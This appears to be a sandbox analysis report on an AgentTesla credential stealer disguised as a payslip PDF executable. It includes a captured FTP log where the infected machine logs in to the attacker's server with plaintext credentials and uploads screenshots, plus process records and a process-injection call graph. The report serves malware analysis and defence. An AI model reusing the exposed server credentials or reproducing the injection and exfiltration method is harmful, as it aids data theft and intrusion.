                                            Nov 4, 2024 10:16:58.812264919 CET2150024110.4.45.197192.168.2.5331 User origin@haliza.com.my OK. Password required
                                            Nov 4, 2024 10:16:58.816231012 CET5002421192.168.2.5110.4.45.197PASS JesusChrist007$
                                            Nov 4, 2024 10:16:59.197164059 CET2150024110.4.45.197192.168.2.5230 OK. Current restricted directory is /
                                            Nov 4, 2024 10:16:59.552597046 CET2150024110.4.45.197192.168.2.5504 Unknown command
                                            Nov 4, 2024 10:16:59.552714109 CET5002421192.168.2.5110.4.45.197PWD
                                            Nov 4, 2024 10:17:00.009773016 CET2150024110.4.45.197192.168.2.5257 "/" is your current location
                                            Nov 4, 2024 10:17:00.012265921 CET5002421192.168.2.5110.4.45.197TYPE I
                                            Nov 4, 2024 10:17:00.412107944 CET2150024110.4.45.197192.168.2.5200 TYPE is now 8-bit binary
                                            Nov 4, 2024 10:17:00.412257910 CET5002421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:17:00.767286062 CET2150024110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,195,13)
                                            Nov 4, 2024 10:17:01.025422096 CET2150024110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,195,13)
                                            Nov 4, 2024 10:17:01.025851965 CET5002421192.168.2.5110.4.45.197STOR SC_user-960781_2025_02_02_22_26_07.jpeg
                                            Nov 4, 2024 10:17:01.970776081 CET2150024110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:17:02.786523104 CET2150024110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.819 seconds (measured here), 78.66 Kbytes per second
                                            Nov 4, 2024 10:17:04.839067936 CET5002421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:17:05.194322109 CET2150024110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,195,146)
                                            Nov 4, 2024 10:17:05.200253963 CET5002421192.168.2.5110.4.45.197STOR SC_user-960781_2025_02_08_00_19_37.jpeg
                                            Nov 4, 2024 10:17:06.114967108 CET2150024110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:17:06.904292107 CET2150024110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.790 seconds (measured here), 81.62 Kbytes per second
                                            Nov 4, 2024 10:17:10.855658054 CET4970921192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:17:11.108489037 CET5002421192.168.2.5110.4.45.197PASV
                                            Nov 4, 2024 10:17:11.212542057 CET2149709110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,210,143)
                                            Nov 4, 2024 10:17:11.217829943 CET4970921192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_04_04_17_10.jpeg
                                            Nov 4, 2024 10:17:11.465626955 CET2150024110.4.45.197192.168.2.5227 Entering Passive Mode (110,4,45,197,208,166)
                                            Nov 4, 2024 10:17:11.472387075 CET5002421192.168.2.5110.4.45.197STOR SC_user-960781_2024_11_04_04_17_10.jpeg
                                            Nov 4, 2024 10:17:12.140006065 CET2149709110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:17:12.398058891 CET2150024110.4.45.197192.168.2.5150 Accepted data connection
                                            Nov 4, 2024 10:17:12.910747051 CET2149709110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.774 seconds (measured here), 83.32 Kbytes per second
                                            Nov 4, 2024 10:17:13.186772108 CET2150024110.4.45.197192.168.2.5226-File successfully transferred
                                            226-File successfully transferred226 0.789 seconds (measured here), 81.65 Kbytes per second

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:04:12:59
                                            Start date:04/11/2024
                                            Path:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                                            Imagebase:0x580000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:04:13:00
                                            Start date:04/11/2024
                                            Path:C:\Users\user\Desktop\Payslip_October_2024_pdf.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payslip_October_2024_pdf.exe"
                                            Imagebase:0x790000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:4
                                            Start time:04:13:12
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xc50000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 34%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:04:13:13
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xb20000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:04:13:20
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xd80000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:04:13:21
                                            Start date:04/11/2024
                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                            Imagebase:0xd00000
                                            File size:780'288 bytes
                                            MD5 hash:0D4985C828F3F9F6974B1602C92EE962
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:8.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:213
                                              Total number of Limit Nodes:10
                                              execution_graph 33207 6d1a2e8 33208 6d1a2e9 33207->33208 33213 6d1a8b9 33208->33213 33230 6d1a92e 33208->33230 33248 6d1a8c8 33208->33248 33209 6d1a2f9 33214 6d1a8bc 33213->33214 33265 6d1b077 33214->33265 33270 6d1ad8c 33214->33270 33276 6d1b14a 33214->33276 33281 6d1b20b 33214->33281 33290 6d1ae68 33214->33290 33295 6d1acc8 33214->33295 33299 6d1b268 33214->33299 33308 6d1ad67 33214->33308 33313 6d1af27 33214->33313 33321 6d1ae05 33214->33321 33326 6d1b082 33214->33326 33331 6d1ad3c 33214->33331 33336 6d1b1fb 33214->33336 33341 6d1af9b 33214->33341 33215 6d1a8ea 33215->33209 33231 6d1a8bc 33230->33231 33232 6d1a931 33230->33232 33234 6d1b077 2 API calls 33231->33234 33235 6d1af9b 2 API calls 33231->33235 33236 6d1b1fb 2 API calls 33231->33236 33237 6d1ad3c 3 API calls 33231->33237 33238 6d1b082 3 API calls 33231->33238 33239 6d1ae05 2 API calls 33231->33239 33240 6d1af27 5 API calls 33231->33240 33241 6d1ad67 3 API calls 33231->33241 33242 6d1b268 5 API calls 33231->33242 33243 6d1acc8 2 API calls 33231->33243 33244 6d1ae68 2 API calls 33231->33244 33245 6d1b20b 5 API calls 33231->33245 33246 6d1b14a 2 API calls 33231->33246 33247 6d1ad8c 3 API calls 33231->33247 33232->33209 33233 6d1a8ea 33233->33209 33234->33233 33235->33233 33236->33233 33237->33233 33238->33233 33239->33233 33240->33233 33241->33233 33242->33233 33243->33233 33244->33233 33245->33233 33246->33233 33247->33233 33249 6d1a8e2 33248->33249 33251 6d1b077 2 API calls 33249->33251 33252 6d1af9b 2 API calls 33249->33252 33253 6d1b1fb 2 API calls 33249->33253 33254 6d1ad3c 3 API calls 33249->33254 33255 6d1b082 3 API calls 33249->33255 33256 6d1ae05 2 API calls 33249->33256 33257 6d1af27 5 API calls 33249->33257 33258 6d1ad67 3 API calls 33249->33258 33259 6d1b268 5 API calls 33249->33259 33260 6d1acc8 2 API calls 33249->33260 33261 6d1ae68 2 API calls 33249->33261 33262 6d1b20b 5 API calls 33249->33262 33263 6d1b14a 2 API calls 33249->33263 33264 6d1ad8c 3 API calls 33249->33264 33250 6d1a8ea 33250->33209 33251->33250 33252->33250 33253->33250 33254->33250 33255->33250 33256->33250 33257->33250 33258->33250 33259->33250 33260->33250 33261->33250 33262->33250 33263->33250 33264->33250 33266 6d1b104 33265->33266 33347 6d19390 33266->33347 33351 6d19398 33266->33351 33267 6d1b122 33272 6d1ad3c 33270->33272 33271 6d1b262 33271->33215 33272->33271 33355 6d1bad1 33272->33355 33360 6d1bb48 33272->33360 33368 6d1bad8 33272->33368 33277 6d1b150 33276->33277 33384 6d19979 33277->33384 33388 6d19980 33277->33388 33278 6d1b2d3 33278->33215 33392 6d1b970 33281->33392 33397 6d1b960 33281->33397 33282 6d1ad3c 33283 6d1b40d 33282->33283 33284 6d1b61e 33282->33284 33287 6d1bad1 2 API calls 33282->33287 33288 6d1bad8 2 API calls 33282->33288 33289 6d1bb48 3 API calls 33282->33289 33283->33215 33287->33282 33288->33282 33289->33282 33291 6d1ae76 33290->33291 33410 6d19450 33291->33410 33414 6d19458 33291->33414 33292 6d1af8a 33292->33215 33418 6d19b18 33295->33418 33422 6d19b0c 33295->33422 33300 6d1b271 33299->33300 33303 6d19450 WriteProcessMemory 33300->33303 33304 6d19458 WriteProcessMemory 33300->33304 33301 6d1b5a7 33302 6d1ad3c 33302->33301 33305 6d1bad1 2 API calls 33302->33305 33306 6d1bad8 2 API calls 33302->33306 33307 6d1bb48 3 API calls 33302->33307 33303->33302 33304->33302 33305->33302 33306->33302 33307->33302 33309 6d1ad3c 33308->33309 33310 6d1bad1 2 API calls 33309->33310 33311 6d1bad8 2 API calls 33309->33311 33312 6d1bb48 3 API calls 33309->33312 33310->33309 33311->33309 33312->33309 33316 6d192c0 Wow64SetThreadContext 33313->33316 33317 6d192b9 Wow64SetThreadContext 33313->33317 33314 6d1b50c 33315 6d1ad3c 33315->33314 33318 6d1bad1 2 API calls 33315->33318 33319 6d1bad8 2 API calls 33315->33319 33320 6d1bb48 3 API calls 33315->33320 33316->33315 33317->33315 33318->33315 33319->33315 33320->33315 33322 6d1ae15 33321->33322 33324 6d19450 WriteProcessMemory 33322->33324 33325 6d19458 WriteProcessMemory 33322->33325 33323 6d1af07 33323->33215 33324->33323 33325->33323 33327 6d1ad3c 33326->33327 33328 6d1bad1 2 API calls 33327->33328 33329 6d1bad8 2 API calls 33327->33329 33330 6d1bb48 3 API calls 33327->33330 33328->33327 33329->33327 33330->33327 33332 6d1ad48 33331->33332 33332->33331 33333 6d1bad1 2 API calls 33332->33333 33334 6d1bad8 2 API calls 33332->33334 33335 6d1bb48 3 API calls 33332->33335 33333->33332 33334->33332 33335->33332 33337 6d1b1ff 33336->33337 33339 6d19980 ReadProcessMemory 33337->33339 33340 6d19979 ReadProcessMemory 33337->33340 33338 6d1b2d3 33338->33215 33339->33338 33340->33338 33343 6d1afa7 33341->33343 33342 6d1b5cd 33342->33215 33343->33342 33345 6d19980 ReadProcessMemory 33343->33345 33346 6d19979 ReadProcessMemory 33343->33346 33344 6d1b2d3 33344->33215 33345->33344 33346->33344 33348 6d19398 VirtualAllocEx 33347->33348 33350 6d19415 33348->33350 33350->33267 33352 6d193d8 VirtualAllocEx 33351->33352 33354 6d19415 33352->33354 33354->33267 33356 6d1bad8 33355->33356 33373 6d19210 33356->33373 33377 6d19209 33356->33377 33357 6d1bb00 33357->33272 33361 6d1baf4 33360->33361 33365 6d1bb56 33360->33365 33362 6d1bb00 33361->33362 33366 6d19210 ResumeThread 33361->33366 33367 6d19209 ResumeThread 33361->33367 33362->33272 33363 6d1bce3 33363->33272 33365->33363 33381 6d12958 33365->33381 33366->33362 33367->33362 33369 6d1baed 33368->33369 33371 6d19210 ResumeThread 33369->33371 33372 6d19209 ResumeThread 33369->33372 33370 6d1bb00 33370->33272 33371->33370 33372->33370 33374 6d19250 ResumeThread 33373->33374 33376 6d19281 33374->33376 33376->33357 33378 6d19250 ResumeThread 33377->33378 33380 6d19281 33378->33380 33380->33357 33382 6d1c1e0 PostMessageW 33381->33382 33383 6d1c24c 33382->33383 33383->33365 33385 6d19980 ReadProcessMemory 33384->33385 33387 6d19a0f 33385->33387 33387->33278 33389 6d199cb ReadProcessMemory 33388->33389 33391 6d19a0f 33389->33391 33391->33278 33393 6d1b985 33392->33393 33402 6d192c0 33393->33402 33406 6d192b9 33393->33406 33394 6d1b99b 33394->33282 33398 6d1b985 33397->33398 33400 6d192c0 Wow64SetThreadContext 33398->33400 33401 6d192b9 Wow64SetThreadContext 33398->33401 33399 6d1b99b 33399->33282 33400->33399 33401->33399 33403 6d19305 Wow64SetThreadContext 33402->33403 33405 6d1934d 33403->33405 33405->33394 33407 6d19305 Wow64SetThreadContext 33406->33407 33409 6d1934d 33407->33409 33409->33394 33411 6d19458 WriteProcessMemory 33410->33411 33413 6d194f7 33411->33413 33413->33292 33415 6d194a0 WriteProcessMemory 33414->33415 33417 6d194f7 33415->33417 33417->33292 33419 6d19ba1 CreateProcessA 33418->33419 33421 6d19d63 33419->33421 33421->33421 33423 6d19b18 CreateProcessA 33422->33423 33425 6d19d63 33423->33425 33425->33425 33162 2744668 33163 274467a 33162->33163 33164 2744686 33163->33164 33166 2744779 33163->33166 33167 274479d 33166->33167 33171 2744888 33167->33171 33175 2744879 33167->33175 33168 27447a7 33168->33164 33172 27448af 33171->33172 33173 274498c 33172->33173 33179 27444d4 33172->33179 33173->33168 33176 27448af 33175->33176 33177 274498c 33176->33177 33178 27444d4 CreateActCtxA 33176->33178 33177->33168 33178->33177 33180 2745918 CreateActCtxA 33179->33180 33182 27459db 33180->33182 33183 274ae28 33186 274af11 33183->33186 33184 274ae37 33188 274af20 33186->33188 33187 274af54 33187->33184 33188->33187 33189 274b158 GetModuleHandleW 33188->33189 33190 274b185 33189->33190 33190->33184 33191 274d2d8 33192 274d31e 33191->33192 33196 274d4a7 33192->33196 33200 274d4b8 33192->33200 33193 274d40b 33197 274d4b8 33196->33197 33203 274b580 33197->33203 33201 274b580 DuplicateHandle 33200->33201 33202 274d4e6 33201->33202 33202->33193 33204 274d520 DuplicateHandle 33203->33204 33206 274d4e6 33204->33206 33206->33193 33153 54d8f40 33154 54d8f4e 33153->33154 33155 54d8f6c 33153->33155 33158 54d708c CloseHandle 33154->33158 33157 54d8f68 33158->33157 33159 54d7900 33160 54d7908 CloseHandle 33159->33160 33161 54d796f 33160->33161

                                              Executed Functions

                                              Function 06D1CFC8 Relevance: .6, Instructions: 595COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cd5c89f29c378bb05c24cdcac6b17ffc79b1f8e0eedef2d2f0cdf357d9b32d0
                                              • Instruction ID: 58100cb6d2a733fa284b6694e2b0d42919be285e467b88f1803ee5e4f13b107a
                                              • Opcode Fuzzy Hash: 6cd5c89f29c378bb05c24cdcac6b17ffc79b1f8e0eedef2d2f0cdf357d9b32d0
                                              • Instruction Fuzzy Hash: C9228831B01214AFEB59DB69E564BAEB7F7AF89700F244469E0469F3A0CB74ED01CB50
                                              Function 054DD470 Relevance: .6, Instructions: 559COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bee8c142d9196ba778e0b26e31a966619ad0f183543dab874dbcef2773d6beba
                                              • Instruction ID: b870a18f7eb2e433df4a9f45753144e5d263d517d8bca48c4cec9743dc077ddd
                                              • Opcode Fuzzy Hash: bee8c142d9196ba778e0b26e31a966619ad0f183543dab874dbcef2773d6beba
                                              • Instruction Fuzzy Hash: 87529F74E01219CFDB64CFA9C994BDDBBB2BF48310F5081AAD809A7355D730AA85CF60
                                              Function 054DC1A3 Relevance: .5, Instructions: 487COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 39fd9c0dc70854b96bb846a8a5c0b1130dc17001dee80b9d53ecb832e5cc51a8
                                              • Instruction ID: e91d0cab971441243cb068270a9dd0d88f0621523dcea423f2a9b29cdabd6871
                                              • Opcode Fuzzy Hash: 39fd9c0dc70854b96bb846a8a5c0b1130dc17001dee80b9d53ecb832e5cc51a8
                                              • Instruction Fuzzy Hash: E032B274A01219CFDB54DFA9C584A9EFBB2BF49311F55D196D408AB212CB30EE85CFA0
                                              Function 054DFB78 Relevance: .3, Instructions: 347COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044494192.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_54d0000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e94db46b6e7bd748f6675f658f31dd245ff9546d8f37a93d0c4ec346fc68ebac
                                              • Instruction ID: 54fc72605eac0724f7567063f0f8b417d070de919b420c21eae1a8f3d355a68d
                                              • Opcode Fuzzy Hash: e94db46b6e7bd748f6675f658f31dd245ff9546d8f37a93d0c4ec346fc68ebac
                                              • Instruction Fuzzy Hash: A5F12874E041199FCB14DFA8D5909AEFBF2FF89305F24816AD805AB356D730A946CFA0
                                              Function 02746F90 Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f542f8fd529939ff08dd932d87d1fa58084d286b872a4cd7eac80254bdcd6dd
                                              • Instruction ID: ec2f94d64eee8639c91ad8558480728d8adeb5b660e6fd11ab79a0ae6fa2b43c
                                              • Opcode Fuzzy Hash: 3f542f8fd529939ff08dd932d87d1fa58084d286b872a4cd7eac80254bdcd6dd
                                              • Instruction Fuzzy Hash: 5851D870E0120C9FDB09DFA5D855AEEBBB2FF88304F14852AD409AB365DB359946CF80
                                              Function 02744210 Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2033087910.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Offset: 02740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2740000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8936962d979a232e1105334aa05ee41b421e18618a981f7b226c02e30b6460f3
                                              • Instruction ID: 4a4d434c7ac226b4be6335d97675fae1f1265dfeed1567749791d92156358ec6
                                              • Opcode Fuzzy Hash: 8936962d979a232e1105334aa05ee41b421e18618a981f7b226c02e30b6460f3
                                              • Instruction Fuzzy Hash: C651C670E0120C9FDB09DFA9D855AEEBBB6FF88304F148529D409AB364DB359945CF80
                                              Function 06D19B0C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 366 6d19b0c-6d19bad 369 6d19be6-6d19c06 366->369 370 6d19baf-6d19bb9 366->370 375 6d19c08-6d19c12 369->375 376 6d19c3f-6d19c6e 369->376 370->369 371 6d19bbb-6d19bbd 370->371 373 6d19be0-6d19be3 371->373 374 6d19bbf-6d19bc9 371->374 373->369 377 6d19bcb 374->377 378 6d19bcd-6d19bdc 374->378 375->376 380 6d19c14-6d19c16 375->380 384 6d19c70-6d19c7a 376->384 385 6d19ca7-6d19d61 CreateProcessA 376->385 377->378 378->378 379 6d19bde 378->379 379->373 381 6d19c39-6d19c3c 380->381 382 6d19c18-6d19c22 380->382 381->376 386 6d19c24 382->386 387 6d19c26-6d19c35 382->387 384->385 388 6d19c7c-6d19c7e 384->388 398 6d19d63-6d19d69 385->398 399 6d19d6a-6d19df0 385->399 386->387 387->387 389 6d19c37 387->389 390 6d19ca1-6d19ca4 388->390 391 6d19c80-6d19c8a 388->391 389->381 390->385 393 6d19c8c 391->393 394 6d19c8e-6d19c9d 391->394 393->394 394->394 395 6d19c9f 394->395 395->390 398->399 409 6d19e00-6d19e04 399->409 410 6d19df2-6d19df6 399->410 412 6d19e14-6d19e18 409->412 413 6d19e06-6d19e0a 409->413 410->409 411 6d19df8 410->411 411->409 415 6d19e28-6d19e2c 412->415 416 6d19e1a-6d19e1e 412->416 413->412 414 6d19e0c 413->414 414->412 418 6d19e3e-6d19e45 415->418 419 6d19e2e-6d19e34 415->419 416->415 417 6d19e20 416->417 417->415 420 6d19e47-6d19e56 418->420 421 6d19e5c 418->421 419->418 420->421 423 6d19e5d 421->423 423->423
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D19D4E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6125cc01436606629ddd1e5e144f0dd5917612b513f683030488a9d5d02dadf0
                                              • Instruction ID: 8cb7044e5aac61a6bf9752b2314a218ffc3f1db5942c4f57e8e8521e28c5b6fa
                                              • Opcode Fuzzy Hash: 6125cc01436606629ddd1e5e144f0dd5917612b513f683030488a9d5d02dadf0
                                              • Instruction Fuzzy Hash: F7A1AF71D00219DFEB60CF68D8617EDBBF2BF44314F148569D848AB240DBB49985CF92
                                              Function 06D19B18 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 424 6d19b18-6d19bad 426 6d19be6-6d19c06 424->426 427 6d19baf-6d19bb9 424->427 432 6d19c08-6d19c12 426->432 433 6d19c3f-6d19c6e 426->433 427->426 428 6d19bbb-6d19bbd 427->428 430 6d19be0-6d19be3 428->430 431 6d19bbf-6d19bc9 428->431 430->426 434 6d19bcb 431->434 435 6d19bcd-6d19bdc 431->435 432->433 437 6d19c14-6d19c16 432->437 441 6d19c70-6d19c7a 433->441 442 6d19ca7-6d19d61 CreateProcessA 433->442 434->435 435->435 436 6d19bde 435->436 436->430 438 6d19c39-6d19c3c 437->438 439 6d19c18-6d19c22 437->439 438->433 443 6d19c24 439->443 444 6d19c26-6d19c35 439->444 441->442 445 6d19c7c-6d19c7e 441->445 455 6d19d63-6d19d69 442->455 456 6d19d6a-6d19df0 442->456 443->444 444->444 446 6d19c37 444->446 447 6d19ca1-6d19ca4 445->447 448 6d19c80-6d19c8a 445->448 446->438 447->442 450 6d19c8c 448->450 451 6d19c8e-6d19c9d 448->451 450->451 451->451 452 6d19c9f 451->452 452->447 455->456 466 6d19e00-6d19e04 456->466 467 6d19df2-6d19df6 456->467 469 6d19e14-6d19e18 466->469 470 6d19e06-6d19e0a 466->470 467->466 468 6d19df8 467->468 468->466 472 6d19e28-6d19e2c 469->472 473 6d19e1a-6d19e1e 469->473 470->469 471 6d19e0c 470->471 471->469 475 6d19e3e-6d19e45 472->475 476 6d19e2e-6d19e34 472->476 473->472 474 6d19e20 473->474 474->472 477 6d19e47-6d19e56 475->477 478 6d19e5c 475->478 476->475 477->478 480 6d19e5d 478->480 480->480
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D19D4E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2044682435.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d10000_Payslip_October_2024_pdf.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: cca8e27effccacada4ade1ca6a36923e6a209e6d29dff03eff9a374d2b758835
                                              • Instruction ID: fb52576c5d4b2131d3a501bec63aa9901f4c7f3217868cc429fe73316910dbdf
                                              • Opcode Fuzzy Hash: cca8e27effccacada4ade1ca6a36923e6a209e6d29dff03eff9a374d2b758835
                                              • Instruction Fuzzy Hash: D3918C71D00219DFEB64CF68D8607EDBBF2BF48314F14856AD849AB240DBB49985CF92
                                              Function 0274AF11 Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
